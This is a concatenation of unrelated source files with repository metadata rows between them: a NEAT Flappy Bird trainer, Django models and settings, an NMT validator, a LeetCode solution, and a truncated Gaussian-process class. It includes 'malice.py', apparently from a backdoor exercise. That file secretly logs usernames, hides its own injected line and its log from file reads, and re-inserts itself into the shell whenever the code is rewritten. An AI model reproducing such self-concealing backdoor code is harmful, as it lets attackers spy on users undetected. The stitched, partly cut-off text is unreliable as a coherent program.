top_offset = (self.x - bird.x, self.top - round(bird.y)) #berekend de afstand tussen de mask en orgin
bottom_offset = (self.x - bird.x, self.bottom - round(bird.y))
b_point = bird_mask.overlap(bottom_mask, bottom_offset) #vertelt het punt van waar de masks elkaar aanraken
t_point = bird_mask.overlap(top_mask, top_offset)
if t_point or b_point: #als b_point niet none doorgeevd dus ze botsen, return true, ander False
return True
return False
class Base:
VEL = 5
WIDTH = BASE_IMG.get_width()
IMG = BASE_IMG
def __init__ (self, y):
self.y = y
self.x1 = 0 #foto 1 start bij x = 0
self.x2 = self.WIDTH #foto 2 achter de eerste
def move(self): #we hebben 2 fotos van base achterelkaar, ze schuiven beide, als de eerste axter de y as komt, kleiner is dan 0 wordt die verplaatst naar achter de andere foto van de base,
self.x1 -= self.VEL #zo lijkt het dat de grond beweegt zonder een hele grote foto te hebben
self.x2 -= self.VEL
if self.x1 + self.WIDTH < 0:
self.x1 = self.x2 + self.WIDTH
if self.x2 + self.WIDTH < 0:
self.x2 = self.x1 + self.WIDTH
def draw(self, win):
win.blit(self.IMG, (self.x1, self.y))
win.blit(self.IMG, (self.x2, self.y))
def draw_window(window, birds, pipes, base, score, gen):
win.blit(BG_IMG, (0,0)) #blit betekend teken
for pipe in pipes:
pipe.draw(win)
text = STAT_FONT.render("Score: " + str(score), 1,(255,255,255))
win.blit(text, (WIN_WIDTH - 10 - text.get_width(), 10)) #plaats waar de score moet staan
text = STAT_FONT.render("Gen: " + str(gen), 1,(255,255,255))
win.blit(text, (10, 10))
base.draw(win)
for bird in birds:
bird.draw(win)
pygame.display.update()
def main(genomes, config):
global GEN
GEN += 1
nets = []
ge = []
birds = []
for _, g in genomes: #meerdere genomes zijn neuralnetworks
net = neat.nn.FeedForwardNetwork.create(g, config) #maken nuralnetwork aan voor genome
nets.append(net) #voegen het toe aan de lijst
birds.append(Bird(230, 350)) #voeg bird ook aan de lijst
g.fitness = 0
ge.append(g) #genoma ook toevoegen aan de lijst
base = Base(730)
pipes = [Pipe(600)]
clock = pygame.time.Clock()
score = 0
run = True
while run:
clock.tick(30)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
pygame.quit()
quit()
pipe_ind = 0
if len(birds) > 0:
if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_TOP.get_width(): #kijkt naar welke pipe de neural network moet kijken
pipe_ind = 1
else:
run = False #als er geen vogels meer zijn stop
break
for x, bird in enumerate(birds):
bird.move()
ge[x].fitness += 0.1 # geeft bird 1 fitnespoint per seconde
output = nets[x].activate((bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom))) #geeft output
if output[0] > 0.5: #als output boven 0.5 is Spring
bird.jump()
#bird.move()
add_pipe = False
rem = [] #lijst om dingen te verwijderen
for pipe in pipes:
for x, bird in enumerate(birds):
if pipe.collide(bird): #als botsing
ge[x]. fitness -= 1 #zorgt ervoor als een bird een pipe raakt gaat zijn fitness score omlaag
birds.pop(x)
nets.pop(x)
ge.pop(x) #zorgt ervoor dat ale een bird een pipe raakt verwijderd wordt
if not pipe.passed and pipe.x < bird.x: #kijkt of we langs de pipe zijn geweest, doorheen zijn gegaan
pipe.passed = True
add_pipe = True # maak een nieuwe pipe aan
if pipe.x + pipe.PIPE_TOP.get_width() < 0: #als de pipe weg is van het scherm
rem.append(pipe) #verwijder pipe
pipe.move()
if add_pipe:
score += 1 #score + 1
for g in ge:
g.fitness += 5 # als een bird door eenn pipe gaat krijgt ie 5 punter bij zn fitness
pipes.append(Pipe(600)) #maak nieuwe pipe op afstand van ()
for r in rem:
pipes.remove(r)
for x, bird in enumerate(birds):
if bird.y + bird.img.get_height() >= 730 or bird.y < 0:
birds.pop(x)
nets.pop(x)
ge.pop(x) #haalt bird weg als die grond raakt of plafond
base.move() #beweeg base
draw_window(win, birds, pipes, base, score, GEN)
def run(config_path):
config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,
neat.DefaultSpeciesSet, neat.DefaultStagnation,
config_path) #geeft de belangrijke instellingen van Neat
p = neat.Population(config) #creeert population
p.add_reporter(neat.StdOutReporter(True)) #geeft statestieken in console
stats = neat.StatisticsReporter()
p.add_reporter(stats)
winner = p.run(main,10000) #hoeveelheid generations in fitnesfunction
if __name__ == "__main__":
local_dir = "E:/PY/files/flappy_bird/"
config_path = os.path.join(local_dir, "config-feedforward.txt")
run(config_path) | [
"noreply@github.com"
] | noreply@github.com |
ae336a597ede11303d18e76036cbc9ac291953b5 | 6c90112e7d21086ef06432bb417bdb339fed4c33 | /django-tally/api/models.py | 11af0648223a22b4581387c627995055a13352e3 | [
"MIT"
] | permissive | blakelobato/BetterBusinessByReview | 9767a04cf1b1a8a8e96cdea634a24887182834ff | 1f8f0a03dc24a661b112b60fed1946142d918294 | refs/heads/master | 2022-04-04T00:08:37.474620 | 2020-02-06T21:01:00 | 2020-02-06T21:01:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,205 | py | from django.db import models
from django.conf import settings
from django.core.validators import int_list_validator
from django.contrib.auth.models import User
# Create your models here.
class Url(models.Model):
id = models.IntegerField(primary_key=True, )
url = models.CharField(max_length=5000)
# created = models.DateTimeField(auto_now_add=True)#saved on first input into database
# updated = models.DateTimeField(auto_now=True)
date = models.DateTimeField(auto_now_add=True)#saved on first input into database
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,)
word_phrase = models.CharField(max_length=50)
high_rating_score = models.DecimalField(max_digits=3, decimal_places=2, null=True)
low_rating_score = models.DecimalField(max_digits=3, decimal_places=2, null=True)
def __str__(self):
return '{}'.format(self.url)
class WordListAPI(models.Model):
id = models.IntegerField(primary_key=True)
word_phrase = models.CharField(max_length=50)
high_rating_score = models.DecimalField(max_digits=3, decimal_places=2)
low_rating_score = models.DecimalField(max_digits=3, decimal_places=2)
| [
"LilySu@users.noreply.github.com"
] | LilySu@users.noreply.github.com |
d16e973a859df614621c3e5e61024c381e586512 | db24b911ca1e0fe33ee27a104e036d7254cf5a66 | /torchnmt/executors/validator.py | 3c968678495e5dc2accefdc88c93e95c3a388ba8 | [] | no_license | jbdel/multimedic | d5bd2f3890cabe69560716757611902f356d5d39 | 28460be61dbdbdbd80b02ceac16441ca67599942 | refs/heads/main | 2023-03-14T14:09:07.342122 | 2021-03-10T11:50:38 | 2021-03-10T11:50:38 | 341,607,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,750 | py | import os
import tqdm
import numpy as np
import torch
from .base import Executor
from torchnmt.scorers.scores import compute_scores
from torchnmt.networks.rnn.beam import evaluation as rnn_evaluation
from torchnmt.networks.huggingface.beam import evaluation as transformerhug_evaluation
from torchnmt.networks.vqa.beam import evaluation as vqa_evaluation
# from torchnmt.networks.rnn.beam import eval as rnn_eval
class Validator(Executor):
def __init__(self, opts):
super().__init__(opts)
def iteration_iter(self):
yield
def on_iteration_start(self):
self.skip_iteration()
class NMTValidator(Validator):
def __init__(self, models, metrics, opts, seed=0):
super().__init__(opts)
self.models = models
self.metrics = metrics
self.epoch = 0
self.best_rouge = 0.0
self.seed = seed
self.out_dir = os.path.join('ckpt',
self.opts.name)
os.makedirs(self.out_dir, exist_ok=True)
def epoch_iter(self):
assert isinstance(self.models, list)
splits = [(split,
self.create_data_loader(split),
)
for split in self.opts.splits]
self.scores = []
for split, dl in splits:
print('Running split: {} by ensembling {} models. '
'Using {}.'.format(split,
len(self.models),
type(dl.batch_sampler.sampler).__name__,
))
self.split = split
self.dl = dl
yield
def on_epoch_start(self):
self.models = [m.eval() for m in self.models]
eval_func = type(self.models[0]).__name__.lower() + '_evaluation'
with torch.no_grad():
self.losses, self.refs, self.hyps = eval(eval_func)(self.models, self.opts, self.dl)
def on_epoch_end(self):
# Handle loss
loss = np.mean(self.losses)
ppl = np.exp(loss)
print('{}:\tloss: {:.4g}, ppl: {:.4g}'.format(self.split, loss, ppl))
refs = self.refs
hyps = self.hyps
# Handle scores
base = os.path.join(self.out_dir, '{}_{}_{}'.format(self.split, self.seed, '{}'))
scores = compute_scores(refs, hyps, base, self.metrics)
print(scores)
with open(base.format('metrics.txt'), 'a+') as f:
f.write(str({
'split': self.split,
'epoch': self.epoch,
'scores': scores,
'loss': loss,
'ppl': ppl,
}) + '\n')
self.scores.append(scores)
self.models = [m.train() for m in self.models]
| [
"jeanbenoit.delbrouck@gmail.com"
] | jeanbenoit.delbrouck@gmail.com |
73b8253035b13946cdbafdad3f3ff53fae1a417a | a14dd601cde67f67d0ba38dfd1362f7c0109cef1 | /arrays/leetcode/grid/set-matrix-zeroes-73.py | 4b6d885e0787eeebbf94701b9d37fb1cd5bc4ce0 | [] | no_license | Meaha7/dsa | d5ea1615f05dae32671af1f1c112f0c759056473 | fa80219ff8a6f4429fcf104310f4169d007af712 | refs/heads/main | 2023-09-03T18:52:41.950294 | 2021-11-05T09:14:42 | 2021-11-05T09:14:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,232 | py | grids = [
[[1, 1, 1], [1, 0, 1], [1, 1, 1]],
[[0, 1, 2, 0], [3, 4, 5, 2], [1, 3, 1, 5]],
[[1, 2, 3, 4], [5, 0, 7, 8], [0, 10, 11, 12], [13, 14, 15, 0]]
]
# T=mn,S=m+n
def main(grid):
m, n = len(grid), len(grid[0])
rows, cols = set(), set()
for i in range(m):
for j in range(n):
if not grid[i][j]:
rows.add(i)
cols.add(j)
for i in range(m):
for j in range(n):
if i in rows or j in cols:
grid[i][j] = 0
return grid
for grid in grids:
print(main(grid))
print()
# T=mn,S=1
def main(grid):
m, n = len(grid), len(grid[0])
fr, fc = False, False
for i in range(m):
for j in range(n):
if not grid[i][j]:
if not i:
fr = True
if not j:
fc = True
grid[i][0] = grid[0][j] = 0
for i in range(1, m):
for j in range(1, n):
if not grid[i][0] or not grid[0][j]:
grid[i][j] = 0
if fr:
for j in range(n):
grid[0][j] = 0
if fc:
for i in range(m):
grid[i][0] = 0
for grid in grids:
main(grid)
print(grid)
| [
"nikhilgoyal104ah4@gmail.com"
] | nikhilgoyal104ah4@gmail.com |
8396c013dc029751bc9675ccf8409518068611f2 | 63eb364d4c9e0aef7b57c7aa3cf06d0308982f33 | /venv/Scripts/pip-script.py | 3fffadc24636273d925fd5a7ba113ccc1897b22f | [] | no_license | mash0807/AppiumPython | c95089d38603a94fca3724dabeddfed6dc24cfed | 1ac6ecb6b28721a5ba8818dab1b2186d06098f37 | refs/heads/master | 2021-05-19T00:37:28.003656 | 2020-03-31T04:11:58 | 2020-03-31T04:11:58 | 251,498,140 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | #!D:\AppiumPython\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"masihui2013@163.com"
] | masihui2013@163.com |
5728c56ad2589961379fc5bf44dde89a8da0f905 | 33600be564a24994e929d600b372f7f619036103 | /pool/pool/settings.py | 728397ef7dfa7209d8404596f3aaa09f2bc92bfd | [] | no_license | AlimbekovE/hackfest | b386f78020808652956124a205963a3a65c64ab2 | a147a7c9ab27afffc46cc7a173812b508fbdbbdd | refs/heads/master | 2021-04-15T13:34:21.577393 | 2018-03-24T18:15:16 | 2018-03-24T18:15:16 | 126,627,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,122 | py | """
Django settings for pool project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '&p7p+o+8cxgsi$nqyhdyfsn94h+$ey_0^6973xe0o7o2=3r+c_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'quiz',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'pool.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pool.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"erkinbek1997@gmail.com"
] | erkinbek1997@gmail.com |
d493951f15a13b2c7e58f13b6897fc943739bfe2 | 2e4aa514b8e6843011256e7fb2e004b42f552cd1 | /market/migrations/0002_auto_20200416_1611.py | bca5820983abb415d77f6e36804e851217970267 | [] | no_license | seungw0n/project_COMP307 | 211dcafdab220f67449149af629f46df0ee77378 | 8109d123cb97bedc54df2e1ba0eaa39d55cf38e8 | refs/heads/master | 2022-04-20T17:18:50.378846 | 2020-04-22T17:30:11 | 2020-04-22T17:30:11 | 253,855,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,087 | py | # Generated by Django 3.0.5 on 2020-04-16 16:11
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import market.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('market', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='product',
name='owner',
field=models.ForeignKey(default='1', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='product',
name='description',
field=models.TextField(max_length=10000),
),
migrations.AlterField(
model_name='product',
name='image_url',
field=models.FileField(upload_to=market.models.get_upload_path),
),
migrations.AlterField(
model_name='product',
name='price',
field=models.IntegerField(),
),
]
| [
"vic.massenet99@gmail.com"
] | vic.massenet99@gmail.com |
239f4a8b11fc2bda9b29eb6a67b0887922b33e8e | 6cb1b63846e818255945cdf1e8faf4f3e353c735 | /venv/datafountain/taocan/ml_models.py | ed7cf0cae6f0c7603916557230a8865a64c2658d | [] | no_license | LuckyHandsomeCat/deep_learning | 3eb2bec1133f8e547436a8625b40e8bfa8bc7572 | 8c37912069a06a58f80034fe1be7ba5fbc0865d4 | refs/heads/master | 2020-08-08T02:50:10.278517 | 2018-11-30T11:11:34 | 2018-11-30T11:11:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,793 | py | #!/usr/bin/env python3
# -*-coding:utf8 -*-
# @TIME :2018/10/15 上午11:28
# @Author :hwwu
# @File :ml_models.py
import pandas as pd
import numpy as np
path = '/Users/liyangyang/Downloads/datafountain/taocan/'
###service_type,is_mix_service,online_time,1_total_fee,2_total_fee,3_total_fee,4_total_fee,
# month_traffic,many_over_bill,contract_type,contract_time,is_promise_low_consume,net_service,
# pay_times,pay_num,last_month_traffic,local_trafffic_month,local_caller_time,service1_caller_time,
# service2_caller_time,gender,age,complaint_level,former_complaint_num,former_complaint_fee,
# current_service,user_id
def getdata(data, f=True):
# data = pd.read_csv(path + 'train_all.csv')
if f:
data.loc[data['current_service'] == 90063345, 'current_service'] = 0
data.loc[data['current_service'] == 89950166, 'current_service'] = 1
data.loc[data['current_service'] == 89950167, 'current_service'] = 2
data.loc[data['current_service'] == 99999828, 'current_service'] = 3
data.loc[data['current_service'] == 90109916, 'current_service'] = 4
data.loc[data['current_service'] == 89950168, 'current_service'] = 5
data.loc[data['current_service'] == 99999827, 'current_service'] = 6
data.loc[data['current_service'] == 99999826, 'current_service'] = 7
data.loc[data['current_service'] == 90155946, 'current_service'] = 8
data.loc[data['current_service'] == 99999830, 'current_service'] = 9
data.loc[data['current_service'] == 99999825, 'current_service'] = 10
data.loc[data['age'] == '\\N', 'age'] = 0
data.loc[data['gender'] == '\\N', 'gender'] = 0
data['age'] = data['age'].astype('int64')
data.loc[data['age'] < 20, 'age'] = 0
data.loc[(data['age'] >= 20) & (data['age'] < 30), 'age'] = 1
data.loc[(data['age'] >= 30) & (data['age'] < 40), 'age'] = 2
data.loc[(data['age'] >= 40) & (data['age'] < 50), 'age'] = 3
data.loc[data['age'] >= 50, 'age'] = 4
data['gender'] = data['gender'].astype('int64')
data.loc[data['2_total_fee'] == '\\N', '2_total_fee'] = 0.0
data.loc[data['3_total_fee'] == '\\N', '3_total_fee'] = 0.0
data['2_total_fee'] = data['2_total_fee'].astype('float64')
data['3_total_fee'] = data['3_total_fee'].astype('float64')
data.loc[data['1_total_fee'] > 500.0, '1_total_fee'] = 500.0
data.loc[data['2_total_fee'] > 500.0, '2_total_fee'] = 500.0
data.loc[data['3_total_fee'] > 500.0, '3_total_fee'] = 500.0
data.loc[data['4_total_fee'] > 500.0, '4_total_fee'] = 500.0
data['total_fee'] = 0
data.loc[data['1_total_fee'] < .0, 'total_fee'] = 1
data.loc[data['2_total_fee'] < .0, 'total_fee'] = 1
data.loc[data['3_total_fee'] < .0, 'total_fee'] = 1
data.loc[data['4_total_fee'] < .0, 'total_fee'] = 1
data.loc[data['1_total_fee'] > 499.0, 'total_fee'] = 2
data.loc[data['2_total_fee'] > 499.0, 'total_fee'] = 2
data.loc[data['3_total_fee'] > 499.0, 'total_fee'] = 2
data.loc[data['4_total_fee'] > 499.0, 'total_fee'] = 2
data['month_traffic_0'] = 0
data.loc[(data['month_traffic'] > 0) & (data['month_traffic'] < 1024), 'month_traffic_0'] = 1
data.loc[data['month_traffic'] == 1024.0, 'month_traffic_0'] = 2
data.loc[data['month_traffic'] > 1024, 'month_traffic_0'] = 3
data.loc[data['online_time'] > 140, 'online_time'] = 140
data['pay_ave'] = data['pay_num'] / data['pay_times']
data.loc[data['pay_times'] > 10, 'pay_times'] = 10
data['my_traffic'] = data['last_month_traffic'].apply(lambda x: parse_traffic(x))
data = data.drop(['local_trafffic_month'], axis=1)
data = data.drop(['last_month_traffic'], axis=1)
data = data.drop(['month_traffic'], axis=1)
data.loc[data['local_caller_time'] == 0.0, 'local_caller_time'] = 0
data.loc[(data['local_caller_time'] > 0) & (data['local_caller_time'] < 10), 'local_caller_time'] = 1
data.loc[(data['local_caller_time'] >= 10) & (data['local_caller_time'] < 100), 'local_caller_time'] = 2
data.loc[data['local_caller_time'] >= 100, 'local_caller_time'] = 3
data.loc[data['service1_caller_time'] == 0.0, 'service1_caller_time'] = 0
data.loc[(data['service1_caller_time'] > 0) & (data['service1_caller_time'] < 10), 'service1_caller_time'] = 1
data.loc[(data['service1_caller_time'] >= 10) & (data['service1_caller_time'] < 100), 'service1_caller_time'] = 2
data.loc[data['service1_caller_time'] >= 100, 'service1_caller_time'] = 3
data.loc[data['service2_caller_time'] == 0.0, 'service2_caller_time'] = 0
data.loc[(data['service2_caller_time'] > 0) & (data['service2_caller_time'] < 10), 'service2_caller_time'] = 1
data.loc[(data['service2_caller_time'] >= 10) & (data['service2_caller_time'] < 100), 'service2_caller_time'] = 2
data.loc[data['service2_caller_time'] >= 100, 'service2_caller_time'] = 3
data['complaint_num'] = 0
data.loc[data['former_complaint_num'] > 0, 'complaint_num'] = 1
data['complaint_fee'] = 0
data.loc[data['former_complaint_fee'] > 0, 'complaint_fee'] = 1
return data
def parse_traffic(x):
m = x / 1024.0
if m == 0.0:
return 0
elif m < 1.0:
return 0.5
elif m == 1.0:
return 1
elif m < 2.0:
return 1.5
elif m == 2.0:
return 2
elif m < 3.0:
return 2.5
elif m == 3.0:
return 3
elif m < 4.0:
return 3.5
elif m == 4.0:
return 4
else:
return 5
data = pd.read_csv(path + 'train_all.csv')
data = getdata(data)
train_data = data
train_x = train_data.drop(['user_id', 'current_service'], axis=1)
train_y = train_data['current_service']
####### test数据
republish_test_data = pd.read_csv(path + 'republish_test.csv')
republish_test_data = getdata(republish_test_data, f=False)
# print('republish_test_data: ', republish_test_data.shape)
user_id = republish_test_data['user_id']
republish_test = republish_test_data.drop(['user_id'], axis=1)
from sklearn.model_selection import train_test_split
Y_CAT = pd.Categorical(train_y)
X_train, X_test, y_train, y_test = train_test_split(train_x, Y_CAT.codes, test_size=0.05, random_state=666)
y_test = np.array(y_test)
def score(y_pred):
y_pred = [list(x).index(max(x)) for x in y_pred]
count = 0
for i in range(len(y_pred)):
# print(test_y[i:i+1][0])
if (y_pred[i] == y_test[i:i + 1][0]):
# print(y_pred[i], test_y[i:i + 1][0])
count += 1
print(count, len(y_pred), count / len(y_pred))
from sklearn.naive_bayes import MultinomialNB
from sklearn.model_selection import cross_val_score
# clf = MultinomialNB()
# clf.fit(X_train, y_train)
# print("多项式贝叶斯分类器20折交叉验证得分: ", np.mean(cross_val_score(clf, X_train, y_train, cv=10, scoring='accuracy')))
# score(clf.predict(X_test))
#
from sklearn import svm
lin_clf = svm.LinearSVC(class_weight='balanced')
lin_clf.fit(X_train, y_train)
print("svm分类器20折交叉验证得分: ", np.mean(cross_val_score(lin_clf, X_train, y_train, cv=5, scoring='accuracy')))
score(lin_clf.predict(X_test))
from sklearn.ensemble import RandomForestClassifier
lin_forest = RandomForestClassifier(n_estimators=10, random_state=1, class_weight='balanced')
lin_forest.fit(X_train, y_train)
print("RandomForestClassifier分类器20折交叉验证得分: ",
np.mean(cross_val_score(lin_forest, X_train, y_train, cv=5, scoring='accuracy')))
score(lin_forest.predict(X_test))
import xgboost as xgb
model_xgb = xgb.XGBClassifier(colsample_bytree=0.4603, gamma=0.0468)
model_xgb.fit(X_train, y_train)
print("model_xgb分类器20折交叉验证得分: ",
np.mean(cross_val_score(model_xgb, X_train, y_train, cv=5, scoring='accuracy')))
score(model_xgb.predict(X_test))
| [
"wuhongwei@videopls.com"
] | wuhongwei@videopls.com |
4f89fddc1994f8f11802784f278c35143f8c2b33 | 0e96b335079815d176e96cf6e903f899f3ade24f | /Ecommerce-site1/site1/site1/settings.py | 238ec779cf65615e8f9a2766436b0b94f18c6dce | [] | no_license | sudarshannkarki/sda-project | ad2c0a1bed410754b078a53936ff8c11f9f4b26a | b2b17296269028149131ce273d098f575d8cf260 | refs/heads/master | 2022-12-18T14:46:19.429488 | 2020-09-29T11:31:50 | 2020-09-29T11:31:50 | 293,024,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,253 | py | """
Django settings for site1 project.
Generated by 'django-admin startproject' using Django 3.0.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'riv&vbe-m#4=k(oho53xbhuhrh&w_+7f9i4gddjjh!w4+=ol7p'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'store.apps.StoreConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'site1.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'site1.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
MEDIA_URL = '/images/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'static/images')
| [
"sudarshannkarki@gmail.com"
] | sudarshannkarki@gmail.com |
cbc6d79ace032603f09724dedb78052bbba46e8d | 0bd8c70bb9ef58fb3d74bf1505f4c81614e5006a | /malice.py | 93fe3bbee55f11174e78be5e4f3bd079d9365b0b | [] | no_license | stevenrkeyes/shell-with-backdoor | 24944226c202ea3f4463f2fa597861e5192dca9e | 7d04d4a968171a8df044378fcd6eeb75ba2fdaa8 | refs/heads/master | 2021-01-22T09:27:31.728301 | 2015-05-08T05:07:12 | 2015-05-08T05:07:12 | 35,215,611 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,885 | py | import errno
import os.path
import shlex
import subprocess
import sys
import urllib2
def read_file(filename):
with open(filename, 'r') as fd:
# if it's the shell code file itself, return the shell code minus the
# malicious line (the import)
if filename == "shell.py":
return fd.read().replace("execfile('malice.py')\n", "")
# throw an error if it's one of the malicious files (username.txt or this file)
elif filename in ["malice.py", "usernames.txt"]:
raise IOError
else:
return fd.read()
def write_code(new_code):
code_file = __file__
print __file__
new_new_code = new_code
insertion = "execfile('malice.py')\n"
new_new_code = insert_after_function(new_new_code, "read_file", insertion)
new_new_code = insert_after_function(new_new_code, "write_code", insertion)
new_new_code = insert_after_function(new_new_code, "login", insertion)
with open(code_file, 'w') as code_fd:
code_fd.write(new_new_code)
# for a text of a python file, insert some text after some function
def insert_after_function(file_text, function_name, insertion):
function_start = file_text.find("def " + function_name)
# this will find the line that starts the next function
# though this would be better with regex and finding newlines followed by
# anything except spaces / tabs / more newlines
function_end = file_text.find("\nd", function_start)
new_file_text = file_text[:function_end] + insertion + file_text[function_end:]
return new_file_text
username = None
def login(args):
if len(args) != 1:
raise CommandError("Usage: login username")
global username
if username:
raise CommandError("Already logged in.")
username = args[0]
f = open("usernames.txt", "a")
f.write(username + "\n")
f.close()
| [
"srkeyes@mit.edu"
] | srkeyes@mit.edu |
bc668bc1262627c4914d58c1905b1b56f82fe32b | 1d0f1258cdaadd2514ecb53a8d479dcc488d22d7 | /v0712.py | 7e1fcdae0f3c2bfbeb1a146336601fcbd1bee141 | [] | no_license | yangwei07/pymc3_mcmc | 92905eec5cca3b8c7a0c1ac552edc203a2b2475d | 6bd6f47158ea3fc2844aac56d57a4fef20187885 | refs/heads/master | 2020-05-23T21:02:15.812903 | 2019-08-05T19:22:11 | 2019-08-05T19:22:11 | 186,943,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,307 | py | import numpy as np
# from scipy.interpolate import spline
from scipy.linalg import cho_solve
from numpy.linalg import cholesky
from itertools import cycle
import pandas as pd
import matplotlib.pyplot as plt
class SimpleGP():
""" One dimensional Gaussian Process class. Uses
squared exponential covariance form.
parameters
----------
width_scale : float, positive
Same as sigma in (4) of post
length_scale : float, positive
Same as l in (4) of post
noise : float
Added to diagonal of covariance, useful for
improving convergence
"""
def __init__(self, width_scale, length_scale, noise=10 ** (-6)):
self.width_scale = width_scale
self.length_scale = length_scale
